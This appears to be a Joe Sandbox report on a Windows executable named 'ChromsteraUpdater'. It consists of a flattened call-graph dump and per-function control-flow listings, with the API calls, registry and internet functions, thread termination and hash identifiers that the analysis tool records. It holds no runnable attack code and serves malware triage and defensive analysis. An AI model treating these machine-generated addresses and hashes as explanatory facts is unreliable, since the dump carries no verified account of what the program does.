1414b0 FreeLibrary EnterCriticalSection 75580->75581 75581->75375 75581->75376 75583 141ed1 75582->75583 75584 1415fc CoUninitialize 75582->75584 75583->75582 75587 141ee7 ctype 75583->75587 77504 10a070 RaiseException 75583->77504 75584->75390 75585 141f2c DeleteCriticalSection 75585->75584 75587->75585 75589->75383 75590->75381 75591->75391 75618 d43d0 56 API calls 75617->75618 75619 140ff3 75618->75619 75620 141078 75619->75620 75621 140ff9 75619->75621 75622 d2570 42 API calls 75620->75622 75624 d3470 51 API calls 75621->75624 75623 141082 75622->75623 75625 140f90 77 API calls 75623->75625 75630 141015 75624->75630 75626 1410d0 75625->75626 75628 d43d0 56 API calls 75626->75628 75627 14103b 75693 dd210 75627->75693 75649 1410e8 75628->75649 75630->75627 75709 d35e0 42 API calls 4 library calls 75630->75709 75631 141055 75634 167376 CatchGuardHandler 5 API calls 75631->75634 75632 1411dd 75635 d2570 42 API calls 75632->75635 75636 141070 75634->75636 75637 1411e7 FreeLibrary EnterCriticalSection 75635->75637 75636->75413 75638 141293 LeaveCriticalSection 75637->75638 75639 14124b 75637->75639 75640 1412b9 75638->75640 75653 1412db ctype 75638->75653 75642 141261 75639->75642 75643 141251 DestroyWindow 75639->75643 75644 1412c5 75640->75644 75712 1712b1 14 API calls ___free_lconv_mon 75640->75712 75641 d8750 69 API calls 75641->75649 75642->75638 75647 141271 ctype 75642->75647 75711 1712b1 14 API calls ___free_lconv_mon 75642->75711 75643->75642 75644->75653 75713 1712b1 14 API calls ___free_lconv_mon 75644->75713 75646 dea60 45 API calls 75646->75649 75647->75638 75649->75632 75649->75641 75649->75646 75654 14115a 75649->75654 75655 d43d0 56 API calls 75649->75655 75651 141ea0 2 API calls 75652 141364 CoUninitialize 75651->75652 75652->75413 75653->75651 75657 141178 75654->75657 75710 d35e0 42 API calls 4 library calls 75654->75710 75655->75649 75657->75413 75659 d83eb 75658->75659 75660 d833f 75658->75660 75661 167376 CatchGuardHandler 5 API calls 75659->75661 75660->75659 75662 d43d0 56 API calls 75660->75662 75663 d843b 75661->75663 75664 d834f 75662->75664 75663->75447 75665 d8443 75664->75665 75668 d8359 75664->75668 75666 d2570 42 API calls 75665->75666 75667 d844d 75666->75667 75670 d848d FreeLibrary 75667->75670 75671 d849b 75667->75671 75669 d3470 51 API calls 75668->75669 75674 d8377 75669->75674 75670->75671 75671->75447 75672 d839d 75673 d2420 42 API calls 75672->75673 75676 d83b3 75673->75676 75674->75672 75714 d35e0 42 API calls 4 library calls 75674->75714 75677 d2420 42 API calls 75676->75677 75678 d83d9 75677->75678 75678->75659 75679 d83ef LoadLibraryExW 75678->75679 75679->75659 75681 140f21 75680->75681 75682 141b43 75680->75682 75681->75452 75682->75681 75683 dea60 45 API calls 75682->75683 75684 141b59 75683->75684 75684->75681 75685 141b5d MoveFileW 75684->75685 75685->75681 75686->75419 75687->75428 75688->75436 75689->75433 75690->75445 75691->75439 75692->75448 75694 dd240 75693->75694 75695 d43d0 56 API calls 75694->75695 75697 dd25d 75694->75697 75696 dd250 75695->75696 75696->75697 75698 dd2d1 75696->75698 75700 d3470 51 API calls 75697->75700 75699 d2570 42 API calls 75698->75699 75701 dd2db 75699->75701 75702 dd27b 75700->75702 75703 dd320 ctype 75701->75703 75704 dd312 RegCloseKey 75701->75704 75705 dd288 75702->75705 75706 dd350 44 API calls 75702->75706 75703->75631 75704->75703 75707 d2420 42 API calls 75705->75707 75706->75705 75708 dd29d 75707->75708 75708->75631 75709->75627 75710->75657 75711->75647 75712->75644 75713->75653 75714->75672 75718 167814 _Yarn 75715->75718 75717 167830 numpunct 75719 1695aa CallUnexpected RaiseException 75717->75719 75718->75717 75722 17b0af EnterCriticalSection LeaveCriticalSection numpunct 75718->75722 75720 1683b1 75719->75720 75721 16780f numpunct 3 API calls 75720->75721 75722->75718 75837 139a20 75842 139a76 ctype 75837->75842 76825 1406a0 21 API calls 2 library calls 75837->76825 75840 167376 CatchGuardHandler 5 API calls 75844 138b7f 75840->75844 75842->75840 75844->75540 75844->75541 75880 139acd 75881 d2570 42 API calls 75880->75881 75883 139ad7 75881->75883 75984 13970b 75984->75837 75986 d43d0 56 API calls 75984->75986 75988 13977d 75986->75988 75988->75880 75990 139787 75988->75990 76820 113140 75 API calls 75990->76820 75994 13989d 76821 da0b0 62 API calls 75994->76821 75998 1398ad 75999 d2420 42 API calls 75998->75999 76000 1398c3 75999->76000 76001 d2420 42 API calls 76000->76001 76002 1398d8 76001->76002 76004 139934 76002->76004 76822 da0b0 62 API calls 76002->76822 76006 139984 GetActiveWindow 76004->76006 76824 eed40 LoadStringW LoadStringW MessageBoxW 76006->76824 76008 139909 76823 d2680 69 API calls 76008->76823 76010 13991c 76011 d2420 42 API calls 76010->76011 76011->76004 76012 1399bd 76012->75837 76013->75560 76014->75564 76015->75571 76016->75545 76757 13a2be 76758 13a50d 76757->76758 76760 13a2d2 76757->76760 76759 113650 57 API calls 76758->76759 76762 13a430 76759->76762 76761 13a32d GetActiveWindow 76760->76761 76763 1404e0 32 API calls 76761->76763 76764 1486d0 69 API calls 76762->76764 76772 13a483 76762->76772 76765 13a341 76763->76765 76764->76772 76766 13a354 GetExitCodeThread 76765->76766 76769 13a36a 76765->76769 76767 13a36f GetLastError 76766->76767 76766->76769 76767->76769 76768 1712b1 __freea 14 API calls 76771 139449 76768->76771 76770 13a3be 76769->76770 76773 1502e1 10 API calls 76769->76773 76770->76762 76774 13a3eb WaitForSingleObject 76770->76774 76771->75837 76771->75984 76816 139b30 132 API calls 76771->76816 76772->76768 76772->76771 76773->76770 76775 13a427 CloseHandle 76774->76775 76776 13a3fb GetExitCodeThread 76774->76776 76775->76762 76776->76775 76777 13a413 76776->76777 76777->76775 76778 13a41c TerminateThread 76777->76778 76778->76775 76816->75984 76820->75994 76821->75998 76822->76008 76823->76010 76824->76012 76825->75842 77504->75583 77507 178cd4 77506->77507 77508 178cc2 77506->77508 77518 178b3e 77507->77518 77533 178d5d GetModuleHandleW 77508->77533 77511 178cc7 77511->77507 77534 178dc2 GetModuleHandleExW 77511->77534 77512 167da0 77512->75407 77517 178d26 77519 178b4a ___scrt_is_nonwritable_in_current_image 77518->77519 77540 17926a EnterCriticalSection 77519->77540 77521 178b54 77541 178baa 77521->77541 77523 178b61 77545 178b7f 77523->77545 77526 178d2c 77550 178da0 77526->77550 77529 178d4a 77531 178dc2 CallUnexpected 3 API calls 77529->77531 77530 178d3a GetCurrentProcess TerminateProcess 77530->77529 77532 178d52 ExitProcess 77531->77532 77533->77511 77535 178e22 77534->77535 77536 178e01 GetProcAddress 77534->77536 77538 178cd3 77535->77538 77539 178e28 FreeLibrary 77535->77539 77536->77535 77537 178e15 77536->77537 77537->77535 77538->77507 77539->77538 77540->77521 77542 178bb6 ___scrt_is_nonwritable_in_current_image 77541->77542 77544 178c1d CallUnexpected 77542->77544 77548 17aec9 14 API calls 3 library calls 77542->77548 77544->77523 77549 1792b2 LeaveCriticalSection 77545->77549 77547 178b6d 77547->77512 77547->77526 77548->77544 77549->77547 77555 18252d 6 API calls CallUnexpected 77550->77555 77552 178da5 77553 178d36 77552->77553 77554 178daa GetPEB 77552->77554 77553->77529 77553->77530 77554->77553 77555->77552 77556 17d2cb 77557 17d309 77556->77557 77558 17d2d9 __cftoe 77556->77558 77564 16c8ad 14 API calls __dosmaperr 77557->77564 77558->77557 77560 17d2f4 RtlAllocateHeap 77558->77560 77563 17b0af EnterCriticalSection LeaveCriticalSection numpunct 77558->77563 77560->77558 77561 17d307 77560->77561 77563->77558 77564->77561 77565 da1d0 77566 da212 77565->77566 77567 da245 InternetCrackUrlW 77566->77567 77571 da714 77566->77571 77568 da307 77567->77568 77569 da292 77567->77569 77572 d43d0 56 API calls 77568->77572 77573 d43d0 56 API calls 77569->77573 77570 da772 77574 da7e8 77570->77574 77575 da7d5 77570->77575 77585 da779 77570->77585 77571->77570 77576 da85a 77571->77576 77588 da318 ctype 77572->77588 77577 da297 77573->77577 77580 d9490 42 API calls 77574->77580 77578 de540 42 API calls 77575->77578 77579 d2570 42 API calls 77576->77579 77583 d2570 42 API calls 77577->77583 77586 da29f 77577->77586 77581 da7da 77578->77581 77579->77577 77580->77585 77582 d2420 42 API calls 77581->77582 77582->77585 77584 da873 77583->77584 77588->77576 77588->77577 77592 da374 _LStrxfrm 77588->77592 77636 16c8ad 14 API calls __dosmaperr 77588->77636 77589 da390 77637 16c7af 41 API calls __wsopen_s 77589->77637 77590 da3f0 _wcsrchr 77600 da44a 77590->77600 77639 d85e0 57 API calls 4 library calls 77590->77639 77592->77576 77592->77590 77638 da920 57 API calls 4 library calls 77592->77638 77595 da3e3 77598 d9490 42 API calls 77595->77598 77596 d43d0 56 API calls 77599 da5d9 77596->77599 77597 da43d 77601 d9490 42 API calls 77597->77601 77598->77590 77599->77577 77604 d3470 51 API calls 77599->77604 77602 da4b4 77600->77602 77603 da4d3 77600->77603 77614 da4ce 77600->77614 77601->77600 77640 da920 57 API calls 4 library calls 77602->77640 77603->77614 77641 d85e0 57 API calls 4 library calls 77603->77641 77607 da5ff 77604->77607 77617 da612 77607->77617 77644 d35e0 42 API calls 4 library calls 77607->77644 77608 da4c1 77610 d9490 42 API calls 77608->77610 77609 da4ea 77611 d9490 42 API calls 77609->77611 77610->77614 77615 da4f7 77611->77615 77613 da64c 77616 d43d0 56 API calls 77613->77616 77614->77596 77615->77614 77626 da553 77615->77626 77642 da920 57 API calls 4 library calls 77615->77642 77619 da672 77616->77619 77617->77576 77617->77613 77618 df2a0 42 API calls 77617->77618 77618->77617 77619->77577 77620 d3470 51 API calls 77619->77620 77621 da698 77620->77621 77628 da6ab _wcsrchr 77621->77628 77645 d35e0 42 API calls 4 library calls 77621->77645 77623 da546 77625 d9490 42 API calls 77623->77625 77625->77626 77626->77614 77643 d85e0 57 API calls 4 library calls 77626->77643 77627 da6e4 77627->77571 77633 d2420 42 API calls 77627->77633 77628->77627 77646 dd130 42 API calls 3 library calls 77628->77646 77630 da5a6 77632 d9490 42 API calls 77630->77632 77632->77614 77633->77571 77634 da6d5 77635 d2420 42 API calls 77634->77635 77635->77627 77636->77589 77637->77592 77638->77595 77639->77597 77640->77608 77641->77609 77642->77623 77643->77630 77644->77617 77645->77628 77646->77634

                                                                                                                                                                              Executed Functions

                                                                                                                                                                              Function 0010E060 Relevance: 32.5, APIs: 21, Instructions: 955COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 861 10e060-10e09e call d43d0 864 10e0a0-10e0d8 call 10fa90 861->864 865 10e0db-10e123 call d2570 call d43d0 861->865 873 10e129-10e14e call 10fa90 865->873 874 10e2be-10e300 call d2570 call d43d0 865->874 882 10e150-10e152 873->882 883 10e157-10e177 call d43d0 873->883 884 10e422-10e461 call d2570 call d43d0 874->884 885 10e306-10e32d call 10fa90 874->885 886 10e289-10e29e 882->886 883->874 894 10e17d-10e1d3 call d9490 RegCreateKeyExW 883->894 902 10e467-10e48e call 10fa90 884->902 903 10e5aa-10e5f0 call d2570 call d43d0 884->903 900 10e3f0-10e405 885->900 901 10e333-10e351 call d43d0 885->901 891 10e2a0-10e2a3 886->891 892 10e2a8-10e2bb 886->892 891->892 914 10e1d5-10e1f0 RegQueryValueExW 894->914 915 10e239 894->915 904 10e407-10e40a 900->904 905 10e40f-10e41f 900->905 901->884 916 10e357-10e39f call d9490 RegCreateKeyExW 901->916 922 10e490-10e492 902->922 923 10e497-10e4b5 call d43d0 902->923 927 10e5f6-10e61d call 10fa90 903->927 928 10e71a-10e763 call d2570 call d43d0 903->928 904->905 914->915 920 10e1f2-10e1f5 914->920 919 10e23b-10e258 call 16783f 915->919 949 10e3a1-10e3b0 RegSetValueExW 916->949 950 10e3b6-10e3bf 916->950 937 10e261-10e27f 919->937 938 10e25a-10e25b RegCloseKey 919->938 920->915 925 10e1f7-10e226 call 16783f call 167844 RegQueryValueExW 920->925 929 10e575-10e58a 922->929 923->903 946 10e4bb-10e503 call d9490 RegCreateKeyExW 923->946 925->915 956 10e228-10e237 925->956 957 10e623-10e641 call d43d0 927->957 958 10e6e8-10e6fd 927->958 961 10e8f7-10e971 call d2570 FileTimeToSystemTime call d43d0 928->961 962 10e769-10e78e call 10fa90 928->962 935 10e594-10e5a7 929->935 936 10e58c-10e58f 929->936 936->935 937->886 945 10e281-10e284 937->945 938->937 945->886 973 10e505-10e528 RegQueryValueExW 946->973 974 10e539 946->974 949->950 952 10e3c1-10e3c2 RegCloseKey 950->952 953 10e3c8-10e3e6 950->953 952->953 953->900 959 10e3e8-10e3eb 953->959 956->919 957->928 972 10e647-10e696 call d9490 RegCreateKeyExW 957->972 963 10e707-10e717 958->963 964 10e6ff-10e702 958->964 959->900 983 10eaa6-10eab0 call d2570 961->983 984 10e977-10e99e call 10fa90 961->984 986 10e790-10e792 962->986 987 10e797-10e7b7 call d43d0 962->987 964->963 1001 10e698-10e6a8 RegSetValueExW 972->1001 1002 10e6ae-10e6b7 972->1002 973->974 977 10e52a-10e537 973->977 979 10e53b-10e544 974->979 977->979 981 10e546-10e547 RegCloseKey 979->981 982 10e54d-10e56b 979->982 981->982 982->929 989 10e56d-10e570 982->989 1007 10e9a4-10e9ca call d43d0 984->1007 1008 10ea6a-10ea7f 984->1008 992 10e8c2-10e8d7 986->992 987->961 999 10e7bd-10e80c call d9490 RegCreateKeyExW 987->999 989->929 995 10e8e1-10e8f4 992->995 996 10e8d9-10e8dc 992->996 996->995 1017 10e872 999->1017 1018 10e80e-10e829 RegQueryValueExW 999->1018 1001->1002 1004 10e6c0-10e6de 1002->1004 1005 10e6b9-10e6ba RegCloseKey 1002->1005 1004->958 1009 10e6e0-10e6e3 1004->1009 1005->1004 1007->983 1020 10e9d0-10ea1b call d9490 RegCreateKeyExW 1007->1020 1010 10ea81-10ea84 1008->1010 1011 10ea89-10eaa3 call 167376 1008->1011 1009->958 1010->1011 1021 10e874-10e891 call 16783f 1017->1021 1018->1017 1022 10e82b-10e82e 1018->1022 1035 10ea30-10ea39 1020->1035 1036 10ea1d-10ea2a RegSetValueExW 1020->1036 1029 10e893-10e894 RegCloseKey 1021->1029 1030 10e89a-10e8b8 1021->1030 1022->1017 1024 10e830-10e85f call 16783f call 167844 RegQueryValueExW 1022->1024 1024->1017 1041 10e861-10e870 1024->1041 1029->1030 1030->992 1033 10e8ba-10e8bd 1030->1033 1033->992 1038 10ea42-10ea60 1035->1038 1039 10ea3b-10ea3c RegCloseKey 1035->1039 1036->1035 1038->1008 1040 10ea62-10ea65 1038->1040 1039->1038 1040->1008 1041->1021
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                              • Opcode ID: 8deeca12d74a2b98aac61b673534d1227b818719230526a0223608c395cc11a5
                                                                                                                                                                              • Instruction ID: 7f171485b371608c91ffc00ea9f5303227d29d4a40e17c2bee2277f11eaa54e6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8deeca12d74a2b98aac61b673534d1227b818719230526a0223608c395cc11a5
                                                                                                                                                                              • Instruction Fuzzy Hash: 34729071A01209EFDB10CFA8CC44BAEBBF8FF45714F14865AE915AB391D7759A04CBA0
                                                                                                                                                                              Function 0013A1B0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 376threadwindowCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2025 13a1b0-13a1ec 2026 13a1f2-13a1f6 2025->2026 2027 13a66a 2025->2027 2026->2027 2028 13a1fc-13a202 2026->2028 2029 13a66f-13a681 2027->2029 2028->2027 2030 13a208-13a20f 2028->2030 2030->2027 2031 13a215-13a220 2030->2031 2032 13a242-13a24e call 126a60 2031->2032 2033 13a222-13a22e call 13d090 2031->2033 2039 13a250-13a26a PostThreadMessageW 2032->2039 2040 13a27c-13a2cc call 113590 2032->2040 2033->2032 2038 13a230-13a23d 2033->2038 2038->2029 2041 13a272-13a277 2039->2041 2042 13a26c GetLastError 2039->2042 2045 13a2d2-13a344 call d25a0 call 1150f0 GetActiveWindow call 1404e0 2040->2045 2046 13a50d-13a516 call 113650 2040->2046 2041->2029 2042->2041 2067 13a346 2045->2067 2068 13a34d-13a352 2045->2068 2050 13a51b-13a51d 2046->2050 2052 13a433-13a435 2050->2052 2054 13a522-13a52c 2052->2054 2055 13a43b-13a441 2052->2055 2058 13a532-13a550 2054->2058 2059 13a5bd-13a5e5 call 1486d0 2054->2059 2055->2054 2056 13a447-13a44d 2055->2056 2056->2054 2060 13a453-13a459 2056->2060 2063 13a552-13a555 2058->2063 2064 13a55a-13a576 2058->2064 2072 13a5e7-13a5ea 2059->2072 2073 13a5ef-13a60b 2059->2073 2060->2054 2065 13a45f-13a465 2060->2065 2063->2064 2069 13a580-13a58c 2064->2069 2070 13a578-13a57b 2064->2070 2065->2054 2071 13a46b-13a471 2065->2071 2067->2068 2074 13a354-13a368 GetExitCodeThread 2068->2074 2075 13a379 2068->2075 2076 13a592-13a597 2069->2076 2077 13a658-13a668 2069->2077 2070->2069 2071->2054 2078 13a477-13a47d 2071->2078 2072->2073 2079 13a615-13a621 2073->2079 2080 13a60d-13a610 2073->2080 2081 13a36a-13a36d 2074->2081 2082 13a36f-13a377 GetLastError 2074->2082 2083 13a37b-13a399 2075->2083 2084 13a648-13a651 call 1712b1 2076->2084 2085 13a59d-13a59f 2076->2085 2077->2029 2078->2054 2087 13a483-13a4a1 2078->2087 2079->2077 2088 13a623-13a628 2079->2088 2080->2079 2081->2083 2082->2083 2089 13a3a3-13a3b6 2083->2089 2090 13a39b-13a39e 2083->2090 2084->2077 2091 13a5a0-13a5b6 2085->2091 2095 13a4a3-13a4a6 2087->2095 2096 13a4ab-13a4c7 2087->2096 2088->2084 2097 13a62a-13a62c 2088->2097 2092 13a3b8-13a3b9 call 1502e1 2089->2092 2093 13a3be-13a3cf 2089->2093 2090->2089 2105 13a5b8 2091->2105 2092->2093 2100 13a3d1-13a3d4 2093->2100 2101 13a3d9-13a3e9 2093->2101 2095->2096 2102 13a4d1-13a4dd 2096->2102 2103 13a4c9-13a4cc 2096->2103 2104 13a630-13a646 2097->2104 2100->2101 2106 13a430 2101->2106 2107 13a3eb-13a3f9 WaitForSingleObject 2101->2107 2102->2077 2108 13a4e3-13a4e8 2102->2108 2103->2102 2104->2084 2105->2084 2106->2052 2110 13a427-13a42a CloseHandle 2107->2110 2111 13a3fb-13a411 GetExitCodeThread 2107->2111 2108->2084 2112 13a4ee 2108->2112 2110->2106 2111->2110 2113 13a413-13a41a 2111->2113 2114 13a4f0-13a506 2112->2114 2113->2110 2115 13a41c-13a421 TerminateThread 2113->2115 2117 13a508 2114->2117 2115->2110 2117->2084
                                                                                                                                                                              APIs
                                                                                                                                                                              • PostThreadMessageW.USER32(?,?,00000001,?), ref: 0013A262
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0013A26C
                                                                                                                                                                              • GetActiveWindow.USER32 ref: 0013A332
                                                                                                                                                                              • GetExitCodeThread.KERNEL32(?,?,00000000,?,?,?,?,?,1C327622,?,?), ref: 0013A360
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Thread$ActiveCodeErrorExitLastMessagePostWindow
                                                                                                                                                                              • String ID: '$)
                                                                                                                                                                              • API String ID: 1109395723-1897525437
                                                                                                                                                                              • Opcode ID: 490d36bf23dfc5198644acdddaa874f0e6f4bc4770b5343ec444fb8f578129c4
                                                                                                                                                                              • Instruction ID: 828e6f306f74c61d4364bdb3b8e16ec0f594bdcb4f108d98af8db8554f66e20a
                                                                                                                                                                              • Opcode Fuzzy Hash: 490d36bf23dfc5198644acdddaa874f0e6f4bc4770b5343ec444fb8f578129c4
                                                                                                                                                                              • Instruction Fuzzy Hash: BCF19970501288DFDB10CF68C888B9EBBF4BF05314F588269F8559B2A1D7B4DD49CB92
                                                                                                                                                                              Function 000DA1D0 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 592networkCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 2620 da1d0-da23f call d25a0 * 2 2625 da245-da290 InternetCrackUrlW 2620->2625 2626 da753-da759 2620->2626 2627 da307-da31c call d43d0 2625->2627 2628 da292-da299 call d43d0 2625->2628 2629 da7cc-da7d3 2626->2629 2630 da75b-da75d 2626->2630 2644 da869-da873 call d2570 2627->2644 2645 da322-da326 2627->2645 2628->2644 2646 da29f-da2cd 2628->2646 2633 da7e8-da7ec call d9490 2629->2633 2634 da7d5-da7e6 call de540 call d2420 2629->2634 2635 da85f-da864 call d2570 2630->2635 2636 da763-da767 2630->2636 2649 da7f1-da81f call d25a0 2633->2649 2634->2649 2635->2644 2641 da769-da76c 2636->2641 2642 da77b-da77e 2636->2642 2641->2635 2648 da772-da777 2641->2648 2642->2635 2650 da784-da789 2642->2650 2651 da328-da32a 2645->2651 2652 da330-da339 2645->2652 2667 da2cf-da2d2 2646->2667 2668 da2d7-da2e9 2646->2668 2648->2650 2655 da779 2648->2655 2663 da829-da830 2649->2663 2664 da821-da824 2649->2664 2650->2629 2657 da78b-da7b9 call d25a0 2650->2657 2651->2635 2651->2652 2672 da33f-da34a 2652->2672 2673 da85a call d2590 2652->2673 2655->2657 2669 da7bb-da7be 2657->2669 2670 da7c3-da7ca 2657->2670 2671 da833-da83b 2663->2671 2664->2663 2667->2668 2674 da2eb-da2ee 2668->2674 2675 da2f3-da306 2668->2675 2669->2670 2670->2671 2676 da83d-da840 2671->2676 2677 da845-da859 2671->2677 2672->2635 2679 da350-da353 2672->2679 2673->2635 2674->2675 2676->2677 2679->2635 2680 da359-da366 2679->2680 2681 da368-da36a 2680->2681 2682 da39b-da3b8 2680->2682 2685 da36c-da372 2681->2685 2686 da38b-da396 call 16c8ad call 16c7af 2681->2686 2683 da3ba-da3bf 2682->2683 2684 da414-da422 call 168a73 2682->2684 2683->2635 2689 da3c5-da3c7 2683->2689 2698 da46b-da471 2684->2698 2699 da424-da428 2684->2699 2690 da374-da37e call 168ed0 2685->2690 2691 da380-da388 call 169450 2685->2691 2686->2682 2689->2635 2695 da3cd-da3d4 2689->2695 2690->2682 2691->2686 2695->2684 2701 da3d6-da404 call da920 call d9490 2695->2701 2703 da48f-da493 2698->2703 2704 da473-da476 2698->2704 2699->2698 2705 da42a-da45e call d85e0 call d9490 2699->2705 2722 da40e-da411 2701->2722 2723 da406-da409 2701->2723 2708 da499 2703->2708 2709 da5d4-da5db call d43d0 2703->2709 2704->2703 2707 da478-da47b 2704->2707 2728 da468 2705->2728 2729 da460-da463 2705->2729 2707->2709 2712 da481-da485 2707->2712 2714 da49b-da4a6 call 1689c3 2708->2714 2709->2644 2724 da5e1-da601 call d3470 2709->2724 2712->2709 2717 da48b-da48d 2712->2717 2714->2709 2727 da4ac-da4b2 2714->2727 2717->2714 2722->2684 2723->2722 2740 da603-da60d call d35e0 2724->2740 2741 da612-da620 2724->2741 2731 da4b4-da4ce call da920 call d9490 2727->2731 2732 da4d3 2727->2732 2728->2698 2729->2728 2752 da5b3-da5c7 2731->2752 2732->2709 2733 da4d9-da50b call d85e0 call d9490 2732->2733 2753 da50d-da510 2733->2753 2754 da515-da51c 2733->2754 2740->2741 2745 da64f-da663 2741->2745 2746 da622-da624 2741->2746 2748 da66d-da674 call d43d0 2745->2748 2749 da665-da668 2745->2749 2746->2635 2751 da62a-da62c 2746->2751 2748->2644 2763 da67a-da69a call d3470 2748->2763 2749->2748 2751->2635 2756 da632-da64a call df2a0 2751->2756 2757 da5c9-da5cc 2752->2757 2758 da5d1 2752->2758 2753->2754 2754->2709 2760 da522-da52f call 1689c3 2754->2760 2756->2746 2765 da64c 2756->2765 2757->2758 2758->2709 2768 da574-da578 2760->2768 2769 da531-da537 2760->2769 2777 da69c-da6a6 call d35e0 2763->2777 2778 da6ab-da6be call 168a73 2763->2778 2765->2745 2768->2709 2770 da57a-da589 call 1689c3 2768->2770 2769->2768 2772 da539-da567 call da920 call d9490 2769->2772 2770->2709 2781 da58b-da591 2770->2781 2787 da569-da56c 2772->2787 2788 da571 2772->2788 2777->2778 2789 da6e7-da6eb 2778->2789 2790 da6c0-da6c4 2778->2790 2781->2709 2786 da593-da5ae call d85e0 call d9490 2781->2786 2786->2752 2787->2788 2788->2768 2793 da6ed-da6fa call 1689c3 2789->2793 2794 da705-da714 call d2420 2789->2794 2790->2789 2792 da6c6-da6e4 call dd130 call d2420 2790->2792 2792->2789 2793->2794 2805 da6fc-da703 2793->2805 2803 da717-da72b 2794->2803 2806 da72d-da730 2803->2806 2807 da735-da746 2803->2807 2805->2794 2805->2803 2806->2807 2809 da748-da74b 2807->2809 2810 da750 2807->2810 2809->2810 2810->2626
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 000DA288
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 000DA416
                                                                                                                                                                                • Part of subcall function 000D43D0: GetProcessHeap.KERNEL32 ref: 000D4425
                                                                                                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 000DA6B2
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000008.00000002.1810546549.00000000000D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                              • Associated: 00000008.00000002.1810517264.00000000000D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810635597.00000000001A8000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810702040.00000000001DA000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 00000008.00000002.1810743853.00000000001DE000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_8_2_d0000_ChromsteraUpdater.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcsrchr$CrackHeapInternetProcess
                                                                                                                                                                              • String ID: .aiu$<$<>:"/\|?*
                                                                                                                                                                              • API String ID: 1665875833-3633523513
                                                                                                                                                                              • Opcode ID: 0b90d96e4bfc13724ecac610398ff3b6c450bf0820bff1ad3361a38c66993ae2
                                                                                                                                                                              • Instruction ID: 031b19439db3e8bc7eec70232af08254362d73ded8ef21956a35143c4c9895de
                                                                                                                                                                              • Opcode Fuzzy Hash: 0b90d96e4bfc13724ecac610398ff3b6c450bf0820bff1ad3361a38c66993ae2
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F228031A01709DFDB00DFA9C845BAEB7F4AF55314F14825AE8159B392EB74DE04CBA2
                                                                                                                                                                              Function 001040A0 Relevance: 7.6, APIs: 5, Instructions: 62synchronizationnetworkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 001040B3
                                                                                                                                                                              • InternetConnectW.WININET(001034D2,001034D2,001034D2,001034D2,001034D2,001034D2,001034D2), ref: 001040D6
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 001040E0
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A,?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?), ref: 00104111
                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,001034D2,?,?,?,?,?,00000003,00000000,1C327622,?,?), ref: 00104136
